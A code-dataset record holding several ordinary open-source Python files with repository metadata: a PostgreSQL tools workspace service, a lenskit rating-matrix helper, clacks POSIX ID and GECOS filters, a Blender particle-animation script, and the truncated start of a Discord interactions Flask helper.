pgsqltoolsservice/workspace/workspace_service.py
|
sergb213/pgtoolsservice
|
6296a207e7443fe4ebd5c91d837c033ee7886cab
|
[
"MIT"
] | 1
|
2020-07-30T11:46:44.000Z
|
2020-07-30T11:46:44.000Z
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from logging import Logger # noqa
from typing import Callable, List, Optional # noqa
from pgsqltoolsservice.hosting import JSONRPCServer, NotificationContext, ServiceProvider # noqa
from pgsqltoolsservice.workspace.contracts import (
DID_CHANGE_CONFIG_NOTIFICATION, DidChangeConfigurationParams,
DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, DidChangeTextDocumentParams,
DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, DidOpenTextDocumentParams,
DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, DidCloseTextDocumentParams,
Configuration, Range
)
from pgsqltoolsservice.workspace.script_file import ScriptFile
from pgsqltoolsservice.workspace.workspace import Workspace
class WorkspaceService:
    """
    Class for handling requests/events that deal with the state of the workspace including opening
    and closing of files, the changing of configuration, etc.
    """
    # NOTE(review): no __init__/register is visible in this copy of the class;
    # self._workspace, self._configuration, self._logger and the *_callbacks
    # lists must be initialized elsewhere — confirm against the full source.
    # PROPERTIES ###########################################################
    @property
    def workspace(self) -> Workspace:
        """Gets the current workspace"""
        # Fix: the decorator was stacked twice (@property @property), which
        # turned attribute access into a broken property-of-property object.
        # A separate "configuration" getter may have been elided here; the
        # duplicate decorator is removed so this getter works as intended.
        return self._workspace
    # METHODS ##############################################################
    def get_text(self, file_uri: str, selection_range: Optional[Range]) -> str:
        """
        Get the requested text selection, as a string, for a document
        :param file_uri: The URI of the requested file
        :param selection_range: An object containing information about which part of the file to return,
            or None for the whole file
        :raises ValueError: If there is no file matching the given URI
        """
        open_file = self._workspace.get_file(file_uri)
        if open_file is None:
            raise ValueError('No file corresponding to the given URI')
        if selection_range is None:
            return open_file.get_all_text()
        else:
            return open_file.get_text_in_range(selection_range)
    # REQUEST HANDLERS #####################################################
    def _handle_did_change_config(
            self,
            notification_context: NotificationContext,
            params: DidChangeConfigurationParams
    ) -> None:
        """
        Handles the configuration change event by storing the new configuration and calling all
        registered config change callbacks
        :param notification_context: Context of the notification
        :param params: Parameters from the notification
        """
        self._configuration = params.settings
        for callback in self._config_change_callbacks:
            callback(self._configuration)
    def _handle_did_change_text_doc(
            self,
            notification_context: NotificationContext,
            params: DidChangeTextDocumentParams
    ) -> None:
        """
        Handles text document change notifications
        :param notification_context: Context of the notification
        :param params: Parameters of the notification
        """
        try:
            # Skip processing if the file isn't opened
            script_file: ScriptFile = self._workspace.get_file(params.text_document.uri)
            if script_file is None:
                return
            # Apply the changes to the document
            for text_change in params.content_changes:
                script_file.apply_change(text_change)
            # Propagate the changes to the registered callbacks
            for callback in self._text_change_callbacks:
                callback(script_file)
        except Exception as e:
            if self._logger is not None:
                self._logger.exception(f'Exception caught during text doc change: {e}')
    def _handle_did_open_text_doc(
            self,
            notification_context: NotificationContext,
            params: DidOpenTextDocumentParams
    ) -> None:
        """
        Handles when a file is opened in the workspace. The event is propagated to the registered
        file open callbacks
        :param notification_context: Context of the notification
        :param params: Parameters from the notification
        """
        try:
            # Open a new ScriptFile with the initial buffer provided
            opened_file: ScriptFile = self._workspace.open_file(params.text_document.uri, params.text_document.text)
            if opened_file is None:
                return
            # Propagate the notification to the registered callbacks
            for callback in self._text_open_callbacks:
                callback(opened_file)
        except Exception as e:
            if self._logger is not None:
                self._logger.exception(f'Exception caught during text doc open: {e}')
    def _handle_did_close_text_doc(
            self,
            notification_context: NotificationContext,
            params: DidCloseTextDocumentParams
    ) -> None:
        """
        Handles when a file is closed in the workspace. The event is propagated to the registered
        file close callbacks
        :param notification_context: Context of the notification
        :param params: Parameters from the notification
        """
        try:
            # Attempt to close the requested file
            closed_file: ScriptFile = self._workspace.close_file(params.text_document.uri)
            if closed_file is None:
                return
            # Propagate the notification to the registered callbacks
            for callback in self._text_close_callbacks:
                callback(closed_file)
        except Exception as e:
            if self._logger is not None:
                self._logger.exception(f'Exception caught during text doc close: {e}')
| 44.149733
| 118
| 0.652737
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
from logging import Logger # noqa
from typing import Callable, List, Optional # noqa
from pgsqltoolsservice.hosting import JSONRPCServer, NotificationContext, ServiceProvider # noqa
from pgsqltoolsservice.workspace.contracts import (
DID_CHANGE_CONFIG_NOTIFICATION, DidChangeConfigurationParams,
DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, DidChangeTextDocumentParams,
DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, DidOpenTextDocumentParams,
DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, DidCloseTextDocumentParams,
Configuration, Range
)
from pgsqltoolsservice.workspace.script_file import ScriptFile
from pgsqltoolsservice.workspace.workspace import Workspace
class WorkspaceService:
    """
    Class for handling requests/events that deal with the state of the workspace including opening
    and closing of files, the changing of configuration, etc.
    """
    def __init__(self):
        """Initialize an empty workspace, default configuration, and the event-callback registries."""
        self._service_provider: ServiceProvider = None
        self._server: JSONRPCServer = None
        self._logger: Optional[Logger] = None
        self._workspace: Workspace = None
        # Create a workspace that will handle state for the session
        self._workspace = Workspace()
        self._configuration: Configuration = Configuration()
        # Setup callbacks for the various events we can receive
        self._config_change_callbacks: List[Callable[[Configuration], None]] = []
        self._text_change_callbacks: List[Callable[[ScriptFile], None]] = []
        self._text_open_callbacks: List[Callable[[ScriptFile], None]] = []
        self._text_close_callbacks: List[Callable[[ScriptFile], None]] = []
    def register(self, service_provider: ServiceProvider) -> None:
        """Wire this service into the provider and subscribe to workspace/config notifications."""
        self._service_provider = service_provider
        self._logger = service_provider.logger
        self._server = service_provider.server
        # Register the handlers for when changes to the workspace occur
        self._server.set_notification_handler(DID_CHANGE_TEXT_DOCUMENT_NOTIFICATION, self._handle_did_change_text_doc)
        self._server.set_notification_handler(DID_OPEN_TEXT_DOCUMENT_NOTIFICATION, self._handle_did_open_text_doc)
        self._server.set_notification_handler(DID_CLOSE_TEXT_DOCUMENT_NOTIFICATION, self._handle_did_close_text_doc)
        # Register handler for when the configuration changes
        self._service_provider.server.set_notification_handler(DID_CHANGE_CONFIG_NOTIFICATION,
                                                               self._handle_did_change_config)
    # PROPERTIES ###########################################################
    @property
    def configuration(self) -> Configuration:
        """Gets the current configuration"""
        return self._configuration
    @property
    def workspace(self) -> Workspace:
        """Gets the current workspace"""
        return self._workspace
    # METHODS ##############################################################
    def register_config_change_callback(self, task: Callable[[Configuration], None]) -> None:
        """Register *task* to be called with the new Configuration on every config change."""
        self._config_change_callbacks.append(task)
    def register_text_change_callback(self, task: Callable[[ScriptFile], None]) -> None:
        """Register *task* to be called with the changed ScriptFile on every document edit."""
        self._text_change_callbacks.append(task)
    def register_text_close_callback(self, task: Callable[[ScriptFile], None]) -> None:
        """Register *task* to be called with the ScriptFile when a document is closed."""
        self._text_close_callbacks.append(task)
    def register_text_open_callback(self, task: Callable[[ScriptFile], None]) -> None:
        """Register *task* to be called with the ScriptFile when a document is opened."""
        self._text_open_callbacks.append(task)
    def get_text(self, file_uri: str, selection_range: Optional[Range]) -> str:
        """
        Get the requested text selection, as a string, for a document
        :param file_uri: The URI of the requested file
        :param selection_range: An object containing information about which part of the file to return,
            or None for the whole file
        :raises ValueError: If there is no file matching the given URI
        """
        open_file = self._workspace.get_file(file_uri)
        if open_file is None:
            raise ValueError('No file corresponding to the given URI')
        if selection_range is None:
            return open_file.get_all_text()
        else:
            return open_file.get_text_in_range(selection_range)
    # REQUEST HANDLERS #####################################################
    def _handle_did_change_config(
            self,
            notification_context: NotificationContext,
            params: DidChangeConfigurationParams
    ) -> None:
        """
        Handles the configuration change event by storing the new configuration and calling all
        registered config change callbacks
        :param notification_context: Context of the notification
        :param params: Parameters from the notification
        """
        self._configuration = params.settings
        for callback in self._config_change_callbacks:
            callback(self._configuration)
    def _handle_did_change_text_doc(
            self,
            notification_context: NotificationContext,
            params: DidChangeTextDocumentParams
    ) -> None:
        """
        Handles text document change notifications
        :param notification_context: Context of the notification
        :param params: Parameters of the notification
        """
        try:
            # Skip processing if the file isn't opened
            script_file: ScriptFile = self._workspace.get_file(params.text_document.uri)
            if script_file is None:
                return
            # Apply the changes to the document
            for text_change in params.content_changes:
                script_file.apply_change(text_change)
            # Propagate the changes to the registered callbacks
            for callback in self._text_change_callbacks:
                callback(script_file)
        except Exception as e:
            # Swallow and log: a bad edit must not take down the JSON-RPC server.
            if self._logger is not None:
                self._logger.exception(f'Exception caught during text doc change: {e}')
    def _handle_did_open_text_doc(
            self,
            notification_context: NotificationContext,
            params: DidOpenTextDocumentParams
    ) -> None:
        """
        Handles when a file is opened in the workspace. The event is propagated to the registered
        file open callbacks
        :param notification_context: Context of the notification
        :param params: Parameters from the notification
        """
        try:
            # Open a new ScriptFile with the initial buffer provided
            opened_file: ScriptFile = self._workspace.open_file(params.text_document.uri, params.text_document.text)
            if opened_file is None:
                return
            # Propagate the notification to the registered callbacks
            for callback in self._text_open_callbacks:
                callback(opened_file)
        except Exception as e:
            # Swallow and log: a bad open must not take down the JSON-RPC server.
            if self._logger is not None:
                self._logger.exception(f'Exception caught during text doc open: {e}')
    def _handle_did_close_text_doc(
            self,
            notification_context: NotificationContext,
            params: DidCloseTextDocumentParams
    ) -> None:
        """
        Handles when a file is closed in the workspace. The event is propagated to the registered
        file close callbacks
        :param notification_context: Context of the notification
        :param params: Parameters from the notification
        """
        try:
            # Attempt to close the requested file
            closed_file: ScriptFile = self._workspace.close_file(params.text_document.uri)
            if closed_file is None:
                return
            # Propagate the notification to the registered callbacks
            for callback in self._text_close_callbacks:
                callback(closed_file)
        except Exception as e:
            # Swallow and log: a bad close must not take down the JSON-RPC server.
            if self._logger is not None:
                self._logger.exception(f'Exception caught during text doc close: {e}')
| 2,059
| 0
| 187
|
21b26de6d2b9d84edfee3500275c6ffa369001c4
| 2,322
|
py
|
Python
|
lenskit/data/matrix.py
|
keener101/lkpy
|
7c71e8bd1f367d6a1bf57b36b129e025e2ba374d
|
[
"MIT"
] | 210
|
2018-06-09T19:39:19.000Z
|
2022-03-19T15:14:23.000Z
|
lenskit/data/matrix.py
|
keener101/lkpy
|
7c71e8bd1f367d6a1bf57b36b129e025e2ba374d
|
[
"MIT"
] | 301
|
2018-06-14T22:03:24.000Z
|
2022-03-11T23:05:57.000Z
|
lenskit/data/matrix.py
|
keener101/lkpy
|
7c71e8bd1f367d6a1bf57b36b129e025e2ba374d
|
[
"MIT"
] | 57
|
2018-09-25T00:34:38.000Z
|
2022-02-21T10:09:56.000Z
|
"""
Data manipulation routines.
"""
from collections import namedtuple
import logging
import scipy.sparse as sps
import numpy as np
import pandas as pd
from csr import CSR
_log = logging.getLogger(__name__)
RatingMatrix = namedtuple('RatingMatrix', ['matrix', 'users', 'items'])
RatingMatrix.__doc__ = """
A rating matrix with associated indices.
Attributes:
matrix(CSR or scipy.sparse.csr_matrix):
The rating matrix, with users on rows and items on columns.
users(pandas.Index): mapping from user IDs to row numbers.
items(pandas.Index): mapping from item IDs to column numbers.
"""
def sparse_ratings(ratings, scipy=False, *, users=None, items=None):
    """
    Convert a rating table to a sparse matrix of ratings.

    Args:
        ratings(pandas.DataFrame): a data table of (user, item, rating) triples.
        scipy(bool):
            if ``True`` or ``'csr'``, return a SciPy csr matrix instead of
            :py:class:`CSR`. if ``'coo'``, return a SciPy coo matrix.
        users(pandas.Index): an index of user IDs.
        items(pandas.Index): an index of items IDs.

    Returns:
        RatingMatrix:
            a named tuple containing the sparse matrix, user index, and item index.

    Raises:
        ValueError: if a supplied ``users``/``items`` index does not cover
            every ID present in ``ratings``.
    """
    # Derive the indexes from the data when the caller did not supply them.
    if users is None:
        users = pd.Index(np.unique(ratings.user), name='user')
    if items is None:
        items = pd.Index(np.unique(ratings.item), name='item')
    _log.debug('creating matrix with %d ratings for %d items by %d users',
               len(ratings), len(items), len(users))
    row_ind = users.get_indexer(ratings.user).astype(np.intc)
    if np.any(row_ind < 0):
        raise ValueError('provided user index does not cover all users')
    col_ind = items.get_indexer(ratings.item).astype(np.intc)
    if np.any(col_ind < 0):
        # Bug fix: this message previously said "users" for the item index.
        raise ValueError('provided item index does not cover all items')
    if 'rating' in ratings.columns:
        vals = np.require(ratings.rating.values, np.float64)
    else:
        vals = None  # implicit-feedback data: no rating column
    if scipy == 'coo':
        matrix = sps.coo_matrix(
            (vals, (row_ind, col_ind)), shape=(len(users), len(items))
        )
    else:
        matrix = CSR.from_coo(row_ind, col_ind, vals, (len(users), len(items)))
        if scipy:
            matrix = matrix.to_scipy()
    return RatingMatrix(matrix, users, items)
| 31.378378
| 83
| 0.646856
|
"""
Data manipulation routines.
"""
from collections import namedtuple
import logging
import scipy.sparse as sps
import numpy as np
import pandas as pd
from csr import CSR
_log = logging.getLogger(__name__)
RatingMatrix = namedtuple('RatingMatrix', ['matrix', 'users', 'items'])
RatingMatrix.__doc__ = """
A rating matrix with associated indices.
Attributes:
matrix(CSR or scipy.sparse.csr_matrix):
The rating matrix, with users on rows and items on columns.
users(pandas.Index): mapping from user IDs to row numbers.
items(pandas.Index): mapping from item IDs to column numbers.
"""
def sparse_ratings(ratings, scipy=False, *, users=None, items=None):
    """
    Convert a rating table to a sparse matrix of ratings.

    Args:
        ratings(pandas.DataFrame): a data table of (user, item, rating) triples.
        scipy(bool):
            if ``True`` or ``'csr'``, return a SciPy csr matrix instead of
            :py:class:`CSR`. if ``'coo'``, return a SciPy coo matrix.
        users(pandas.Index): an index of user IDs.
        items(pandas.Index): an index of items IDs.

    Returns:
        RatingMatrix:
            a named tuple containing the sparse matrix, user index, and item index.

    Raises:
        ValueError: if a supplied ``users``/``items`` index does not cover
            every ID present in ``ratings``.
    """
    # Derive the indexes from the data when the caller did not supply them.
    if users is None:
        users = pd.Index(np.unique(ratings.user), name='user')
    if items is None:
        items = pd.Index(np.unique(ratings.item), name='item')
    _log.debug('creating matrix with %d ratings for %d items by %d users',
               len(ratings), len(items), len(users))
    row_ind = users.get_indexer(ratings.user).astype(np.intc)
    if np.any(row_ind < 0):
        raise ValueError('provided user index does not cover all users')
    col_ind = items.get_indexer(ratings.item).astype(np.intc)
    if np.any(col_ind < 0):
        # Bug fix: this message previously said "users" for the item index.
        raise ValueError('provided item index does not cover all items')
    if 'rating' in ratings.columns:
        vals = np.require(ratings.rating.values, np.float64)
    else:
        vals = None  # implicit-feedback data: no rating column
    if scipy == 'coo':
        matrix = sps.coo_matrix(
            (vals, (row_ind, col_ind)), shape=(len(users), len(items))
        )
    else:
        matrix = CSR.from_coo(row_ind, col_ind, vals, (len(users), len(items)))
        if scipy:
            matrix = matrix.to_scipy()
    return RatingMatrix(matrix, users, items)
| 0
| 0
| 0
|
a68ba59292f9e55761ad77efab34d937b8208857
| 6,218
|
py
|
Python
|
agent/src/clacks/agent/plugins/posix/filters.py
|
gonicus/clacks
|
da579f0acc4e48cf2e9451417ac6792282cf7ab6
|
[
"ZPL-2.1"
] | 2
|
2015-01-26T07:15:19.000Z
|
2015-11-09T13:42:11.000Z
|
agent/src/clacks/agent/plugins/posix/filters.py
|
gonicus/clacks
|
da579f0acc4e48cf2e9451417ac6792282cf7ab6
|
[
"ZPL-2.1"
] | null | null | null |
agent/src/clacks/agent/plugins/posix/filters.py
|
gonicus/clacks
|
da579f0acc4e48cf2e9451417ac6792282cf7ab6
|
[
"ZPL-2.1"
] | null | null | null |
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
from clacks.agent.objects.filter import ElementFilter
from clacks.agent.objects.backend.registry import ObjectBackendRegistry
from clacks.common.error import ClacksErrorHandler as C
from clacks.common.utils import N_
# Register the errors handled by us
C.register_codes(dict(
PARAMETER_NOT_NUMERIC=N_("Parameter for '%(target)s' have to be numeric"),
BACKEND_TOO_MANY=N_("Too many backends for %(target)s specified"),
POSIX_ID_POOL_EMPTY=N_("ID pool for attribute %(target)s is empty [> %(max)s]")
))
class GenerateIDs(ElementFilter):
    """
    Generate gid/uidNumbers on demand
    """
    # NOTE(review): this copy of the class has no methods — the implementation
    # appears to have been elided from this version of the file; confirm
    # against the full source before relying on it.
class LoadGecosState(ElementFilter):
    """
    Detects the state of the autoGECOS attribute
    """
    # NOTE(review): this copy of the class has no methods — the implementation
    # appears to have been elided from this version of the file; confirm
    # against the full source before relying on it.
class GenerateGecos(ElementFilter):
    """
    An object filter which automatically generates the posix-gecos
    entry.
    """
    def process(self, obj, key, valDict):
        """Out-filter: rewrite the gecos value when auto-generation is enabled."""
        auto_flags = valDict["autoGECOS"]['value']
        # Only touch gecos when the autoGECOS flag is present and truthy.
        if len(auto_flags) and auto_flags[0]:
            valDict["gecos"]['value'] = [GenerateGecos.generateGECOS(valDict)]
        return key, valDict

    @staticmethod
    def generateGECOS(valDict):
        """Build a gecos string "sn givenName,ou,telephoneNumber,homePhone" from the property dict."""
        def first_value(attr):
            # First stored value of *attr*, or "" when unset or falsy.
            vals = valDict[attr]['value']
            return vals[0] if len(vals) and vals[0] else ""

        return "%s %s,%s,%s,%s" % (
            first_value("sn"), first_value("givenName"), first_value("ou"),
            first_value("telephoneNumber"), first_value("homePhone"))
class GetNextID(ElementFilter):
    """
    An object filter which inserts the next free ID for the property
    given as parameter. But only if the current value is empty.
    =============== =======================
    Name            Description
    =============== =======================
    attributeName   The target attribute we want to generate an ID for. uidNumber/gidNumber
    maxValue        The maximum value that would be dsitributed.
    =============== =======================
    """
    # NOTE(review): this copy of the class has no methods — the implementation
    # appears to have been elided from this version of the file; confirm
    # against the full source before relying on it.
| 35.942197
| 107
| 0.600193
|
# This file is part of the clacks framework.
#
# http://clacks-project.org
#
# Copyright:
# (C) 2010-2012 GONICUS GmbH, Germany, http://www.gonicus.de
#
# License:
# GPL-2: http://www.gnu.org/licenses/gpl-2.0.html
#
# See the LICENSE file in the project's top-level directory for details.
from clacks.agent.objects.filter import ElementFilter
from clacks.agent.objects.backend.registry import ObjectBackendRegistry
from clacks.common.error import ClacksErrorHandler as C
from clacks.common.utils import N_
# Register the errors handled by us
C.register_codes(dict(
PARAMETER_NOT_NUMERIC=N_("Parameter for '%(target)s' have to be numeric"),
BACKEND_TOO_MANY=N_("Too many backends for %(target)s specified"),
POSIX_ID_POOL_EMPTY=N_("ID pool for attribute %(target)s is empty [> %(max)s]")
))
class PosixException(Exception):
    """Error raised by the POSIX filter plugins (bad parameters, exhausted ID pools)."""
    pass
class GenerateIDs(ElementFilter):
    """
    Generate gid/uidNumbers on demand
    """
    def __init__(self, obj):
        super(GenerateIDs, self).__init__(obj)

    def process(self, obj, key, valDict, maxGidValue=65500, maxUidValue=65500):
        """Fill in missing uidNumber/gidNumber values from the backend ID pool.

        :param maxGidValue: upper bound for distributed gidNumbers
        :param maxUidValue: upper bound for distributed uidNumbers
        :raises PosixException: on non-numeric bounds, ambiguous backends,
            or an exhausted ID pool
        """
        try:
            maxUidValue = int(maxUidValue)
            maxGidValue = int(maxGidValue)
        except ValueError:
            raise PosixException(C.make_error("PARAMETER_NOT_NUMERIC", "GenerateIDs"))
        # The uid and gid branches were verbatim duplicates; share one helper.
        self._assign_next_id(valDict, "uidNumber", maxUidValue)
        self._assign_next_id(valDict, "gidNumber", maxGidValue)
        return key, valDict

    @staticmethod
    def _assign_next_id(valDict, attribute, max_value):
        """Assign the next free backend ID for *attribute* if it has no value yet."""
        if attribute not in valDict or len(valDict[attribute]['value']):
            return
        if len(valDict[attribute]['backend']) > 1:
            raise PosixException(C.make_error("BACKEND_TOO_MANY", "GenerateIDs"))
        be = ObjectBackendRegistry.getBackend(valDict[attribute]['backend'][0])
        new_id = be.get_next_id(attribute)
        if new_id > max_value:
            raise PosixException(C.make_error("POSIX_ID_POOL_EMPTY", attribute, max=max_value))
        valDict[attribute]['value'] = [new_id]
class LoadGecosState(ElementFilter):
    """
    Detects the state of the autoGECOS attribute
    """
    def __init__(self, obj):
        super(LoadGecosState, self).__init__(obj)

    def process(self, obj, key, valDict):
        """In-filter: set autoGECOS True when gecos is unset or still matches the generated value."""
        current = valDict['gecos']['value']
        # Auto-mode applies when no gecos exists yet, or the stored gecos is
        # exactly what we would generate (i.e. the user never customized it).
        auto = not current or GenerateGecos.generateGECOS(valDict) == current[0]
        valDict[key]['value'] = [auto]
        return key, valDict
class GenerateGecos(ElementFilter):
    """
    An object filter which automatically generates the posix-gecos
    entry.
    """
    def __init__(self, obj):
        super(GenerateGecos, self).__init__(obj)

    def process(self, obj, key, valDict):
        """Out-filter: rewrite the gecos value when auto-generation is enabled."""
        auto_flags = valDict["autoGECOS"]['value']
        # Only touch gecos when the autoGECOS flag is present and truthy.
        if len(auto_flags) and auto_flags[0]:
            valDict["gecos"]['value'] = [GenerateGecos.generateGECOS(valDict)]
        return key, valDict

    @staticmethod
    def generateGECOS(valDict):
        """Build a gecos string "sn givenName,ou,telephoneNumber,homePhone" from the property dict."""
        def first_value(attr):
            # First stored value of *attr*, or "" when unset or falsy.
            vals = valDict[attr]['value']
            return vals[0] if len(vals) and vals[0] else ""

        return "%s %s,%s,%s,%s" % (
            first_value("sn"), first_value("givenName"), first_value("ou"),
            first_value("telephoneNumber"), first_value("homePhone"))
class GetNextID(ElementFilter):
    """
    An object filter which inserts the next free ID for the property
    given as parameter. But only if the current value is empty.
    =============== =======================
    Name            Description
    =============== =======================
    attributeName   The target attribute we want to generate an ID for. uidNumber/gidNumber
    maxValue        The maximum value that would be dsitributed.
    =============== =======================
    """
    def __init__(self, obj):
        super(GetNextID, self).__init__(obj)

    def process(self, obj, key, valDict, attributeName="uidNumber", maxValue=65500):
        """Replace a sentinel value of -1 with the next free backend ID for *attributeName*."""
        values = valDict[key]['value']
        # Guard clause: only the -1 placeholder triggers ID generation.
        if not values or values[0] != -1:
            return key, valDict
        limit = int(maxValue)
        backends = valDict[key]['backend']
        if len(backends) > 1:
            raise PosixException(C.make_error("BACKEND_TOO_MANY", "GetNextID"))
        backend = ObjectBackendRegistry.getBackend(backends[0])
        next_id = backend.get_next_id(attributeName)
        if next_id > limit:
            raise PosixException(C.make_error("POSIX_ID_POOL_EMPTY", attributeName, max=limit))
        valDict[key]['value'] = [next_id]
        return key, valDict
| 2,905
| 20
| 208
|
26aa104e94d0d68739f234e5b0e9ad3e892fb26d
| 1,724
|
py
|
Python
|
blender_script.py
|
B0und/bad_apple_cube
|
cd3b69d4ccc0ae36626176a425018eb56c92a528
|
[
"MIT"
] | null | null | null |
blender_script.py
|
B0und/bad_apple_cube
|
cd3b69d4ccc0ae36626176a425018eb56c92a528
|
[
"MIT"
] | null | null | null |
blender_script.py
|
B0und/bad_apple_cube
|
cd3b69d4ccc0ae36626176a425018eb56c92a528
|
[
"MIT"
] | null | null | null |
import bpy
import numpy as np
import glob
# Global consts
WIDTH = 160
HEIGHT = 120
PROJECT_PATH = "/PATH/TO/bad_apple_blender_cube"
FRAME_COUNT = len(glob.glob(f'{PROJECT_PATH}/frames/*.jpg'))
# Prepare particle system
cube = bpy.data.objects["Cube"]
degp = bpy.context.evaluated_depsgraph_get()
particle_systems = cube.evaluated_get(degp).particle_systems
particle_systems[0].settings.count = WIDTH * HEIGHT
particle_systems[0].settings.lifetime = 99999
particle_systems[0].settings.frame_start = -1
particle_systems[0].settings.frame_end = 1
particle_systems[0].settings.emit_from = 'VOLUME'
particle_systems[0].settings.physics_type = 'NO'
particle_systems[0].settings.render_type = 'OBJECT'
particle_systems[0].settings.instance_object = cube
particle_systems[0].settings.particle_size = 1.0
# reset particle locations
particles = particle_systems[0].particles
total_particles = len(particles)
flat_list = [0]*(3*total_particles)
particles.foreach_set("location", flat_list)
# load all locations into memory
locations_arr = np.zeros(shape=(FRAME_COUNT, WIDTH*HEIGHT*3))
for i in range(FRAME_COUNT):
temp_arr = np.load(
f"{PROJECT_PATH}/locations/{i}.npy")
locations_arr[i] = temp_arr
def particles_location_setter(scene, degp):
    """
    Set particle locations to a flat numpy array
    """
    # Look up the evaluated (depsgraph) particle system and bulk-assign the
    # precomputed coordinates for the current frame in one foreach_set call.
    psys = cube.evaluated_get(degp).particle_systems
    frame_locations = locations_arr[scene.frame_current]
    psys[0].particles.foreach_set("location", frame_locations)
# clear the post frame handler
bpy.app.handlers.frame_change_post.clear()
# run the function on each frame
bpy.app.handlers.frame_change_post.append(particles_location_setter)
| 30.245614
| 68
| 0.774362
|
import bpy
import numpy as np
import glob
# Global consts
WIDTH = 160
HEIGHT = 120
PROJECT_PATH = "/PATH/TO/bad_apple_blender_cube"
FRAME_COUNT = len(glob.glob(f'{PROJECT_PATH}/frames/*.jpg'))
# Prepare particle system
cube = bpy.data.objects["Cube"]
degp = bpy.context.evaluated_depsgraph_get()
particle_systems = cube.evaluated_get(degp).particle_systems
particle_systems[0].settings.count = WIDTH * HEIGHT
particle_systems[0].settings.lifetime = 99999
particle_systems[0].settings.frame_start = -1
particle_systems[0].settings.frame_end = 1
particle_systems[0].settings.emit_from = 'VOLUME'
particle_systems[0].settings.physics_type = 'NO'
particle_systems[0].settings.render_type = 'OBJECT'
particle_systems[0].settings.instance_object = cube
particle_systems[0].settings.particle_size = 1.0
# reset particle locations
particles = particle_systems[0].particles
total_particles = len(particles)
flat_list = [0]*(3*total_particles)
particles.foreach_set("location", flat_list)
# load all locations into memory
locations_arr = np.zeros(shape=(FRAME_COUNT, WIDTH*HEIGHT*3))
for i in range(FRAME_COUNT):
temp_arr = np.load(
f"{PROJECT_PATH}/locations/{i}.npy")
locations_arr[i] = temp_arr
def particles_location_setter(scene, degp):
    """
    Set particle locations to a flat numpy array
    """
    # Look up the evaluated (depsgraph) particle system and bulk-assign the
    # precomputed coordinates for the current frame in one foreach_set call.
    psys = cube.evaluated_get(degp).particle_systems
    frame_locations = locations_arr[scene.frame_current]
    psys[0].particles.foreach_set("location", frame_locations)
# clear the post frame handler
bpy.app.handlers.frame_change_post.clear()
# run the function on each frame
bpy.app.handlers.frame_change_post.append(particles_location_setter)
| 0
| 0
| 0
|
03b416a08b5dc25b0e21740642be9908f184d5ba
| 2,163
|
py
|
Python
|
discord_interactions/flask_ext/utils.py
|
LiBa001/discord-interactions.py
|
7f19e1b33dfdf2fd9d0a95a164fba8820a031bba
|
[
"MIT"
] | 19
|
2021-01-07T23:57:20.000Z
|
2022-01-23T19:49:46.000Z
|
discord_interactions/flask_ext/utils.py
|
LiBa001/discord-interactions-wrapper
|
7f19e1b33dfdf2fd9d0a95a164fba8820a031bba
|
[
"MIT"
] | 4
|
2021-01-09T01:18:31.000Z
|
2021-06-11T22:39:45.000Z
|
discord_interactions/flask_ext/utils.py
|
LiBa001/discord-interactions-wrapper
|
7f19e1b33dfdf2fd9d0a95a164fba8820a031bba
|
[
"MIT"
] | 2
|
2021-05-21T01:08:19.000Z
|
2021-09-25T03:12:44.000Z
|
#!/usr/bin/env python
"""
MIT License
Original work Copyright (c) 2020 Ian Webster
Modified work Copyright (c) 2020-2021 Linus Bartsch
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from discord_interactions import InteractionType, InteractionCallbackType, verify_key
from flask import request, jsonify
from functools import wraps
| 37.293103
| 88
| 0.714286
|
#!/usr/bin/env python
"""
MIT License
Original work Copyright (c) 2020 Ian Webster
Modified work Copyright (c) 2020-2021 Linus Bartsch
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
"""
from discord_interactions import InteractionType, InteractionCallbackType, verify_key
from flask import request, jsonify
from functools import wraps
def verify_key_decorator(client_public_key):
def _decorator(f):
